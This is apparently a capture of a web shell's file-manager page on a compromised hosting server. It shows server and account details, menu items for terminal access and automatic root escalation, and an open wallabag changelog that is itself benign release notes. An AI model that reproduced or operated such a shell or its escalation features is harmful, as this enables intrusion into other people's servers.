Linux srv25.usacloudserver.us 5.14.0-570.39.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Sep 4 05:08:52 EDT 2025 x86_64
LiteSpeed
Server IP : 23.137.84.82 & Your IP : 216.73.216.127
Domains :
Cant Read [ /etc/named.conf ]
User : epicgamerzoneco
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
softaculous /
wallabag /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-xr-x
2025-10-09 04:26
php53
[ DIR ]
drwxr-xr-x
2025-10-09 04:26
php56
[ DIR ]
drwxr-xr-x
2025-10-09 04:26
php71
[ DIR ]
drwxr-xr-x
2025-10-09 04:26
php81
[ DIR ]
drwxr-xr-x
2025-10-09 04:26
php82
[ DIR ]
drwxr-xr-x
2025-10-09 04:26
.htaccess
87
B
-rw-r--r--
2021-12-23 06:54
NOTES.txt
2.21
KB
-rw-r--r--
2025-10-08 07:01
changelog.txt
3.18
KB
-rw-r--r--
2025-10-08 07:01
clone.php
6.46
KB
-rw-r--r--
2025-10-08 08:02
edit.php
5.99
KB
-rw-r--r--
2025-10-08 08:02
edit.xml
433
B
-rw-r--r--
2021-12-23 06:54
extend.php
2.04
KB
-rw-r--r--
2025-10-08 08:02
fileindex.php
483
B
-rw-r--r--
2023-09-11 02:19
import.php
3.91
KB
-rw-r--r--
2025-10-08 08:02
info.xml
4.77
KB
-rw-r--r--
2025-10-08 07:01
install.js
924
B
-rw-r--r--
2021-12-23 06:54
install.php
8.73
KB
-rw-r--r--
2025-10-08 08:02
install.xml
1.62
KB
-rw-r--r--
2022-04-19 03:48
md5
2.52
KB
-rw-r--r--
2025-10-08 08:02
parameters.yml
1.04
KB
-rw-r--r--
2023-09-11 02:19
soft_delete.php
3.03
KB
-rw-r--r--
2021-12-23 06:54
upgrade.php
24.13
KB
-rw-r--r--
2025-10-08 08:02
upgrade.xml
265
B
-rw-r--r--
2023-10-06 01:43
Save
Rename
## [2.6.14](https://github.com/wallabag/wallabag/tree/2.6.14) [Full Changelog](https://github.com/wallabag/wallabag/compare/2.6.13...2.6.14) ### Improvements * Add annotations filter to entries API endpoint by @skn in https://github.com/wallabag/wallabag/pull/8346 ### Fixes * Fix reading time computation for short entries by @andreadecorte in https://github.com/wallabag/wallabag/pull/8332 * Fix `urls` parameter when sending many urls to be stored using the API by @j0k3r in https://github.com/wallabag/wallabag/pull/8488 * Fix docker base image by @yguedidi in https://github.com/wallabag/wallabag/pull/8440 ### Technical stuff * Change version in wallabag.yml by @nicosomb in https://github.com/wallabag/wallabag/pull/8251 * Fix deprecation by @j0k3r in https://github.com/wallabag/wallabag/pull/8267 * Update dependencies by @yguedidi in https://github.com/wallabag/wallabag/pull/8435 * Bump deps (mostly for siteconfig) by @j0k3r in https://github.com/wallabag/wallabag/pull/8489 ## [2.6.13](https://github.com/wallabag/wallabag/tree/2.6.13) [Full Changelog](https://github.com/wallabag/wallabag/compare/2.6.12...2.6.13) ### Improvements * Add support of Pocket CSV import by @kdecherf and @nicosomb in [https://github.com/wallabag/wallabag/pull/8240](https://github.com/wallabag/wallabag/pull/8240) * Backport Pocket and Shaarli HTML imports from master by @nicosomb in [https://github.com/wallabag/wallabag/pull/8193](https://github.com/wallabag/wallabag/pull/8193) ### Fixes * Avoid non-validated OTP to be enabled #8139 by @j0k3r in [https://github.com/wallabag/wallabag/pull/8139](https://github.com/wallabag/wallabag/pull/8139) ### Technical stuff * Update j0k3r/php-readability:1.2.13 to fix regression (about latin1 instead of UTF-8 used for entries) by @nicosomb [https://github.com/wallabag/wallabag/pull/8194](https://github.com/wallabag/wallabag/pull/8194) ## [2.6.12](https://github.com/wallabag/wallabag/tree/2.6.12) [Full Changelog](https://github.com/wallabag/wallabag/compare/2.6.11...2.6.12) ### Technical stuff * Fix changelog by @yguedidi in [https://github.com/wallabag/wallabag/pull/8135](https://github.com/wallabag/wallabag/pull/8135) * Update dependencies by @yguedidi in [https://github.com/wallabag/wallabag/pull/8136](https://github.com/wallabag/wallabag/pull/8136) ## [2.6.11](https://github.com/wallabag/wallabag/tree/2.6.11) [Full Changelog](https://github.com/wallabag/wallabag/compare/2.6.10...2.6.11) ### Security fix * Protect actions with a CSRF token by @yguedidi in https://github.com/wallabag/wallabag/commit/99c8a06594d6ee7480ce4d041ccff3025b353656 ## [2.6.10](https://github.com/wallabag/wallabag/tree/2.6.10) [Full Changelog](https://github.com/wallabag/wallabag/compare/2.6.9...2.6.10) ### Improvement * Add Omnivore import by @nicosomb in https://github.com/wallabag/wallabag/pull/7754 ### Fixes * Update site config & tests by @j0k3r in https://github.com/wallabag/wallabag/pull/7582 (fixes "Key provided is shorter than 256 bits, only 240 bits provided" https://github.com/wallabag/wallabag/issues/7531) * Update site config by @yguedidi in https://github.com/wallabag/wallabag/pull/7623 * Replace gitter with matrix by @nicosomb in https://github.com/wallabag/wallabag/pull/7753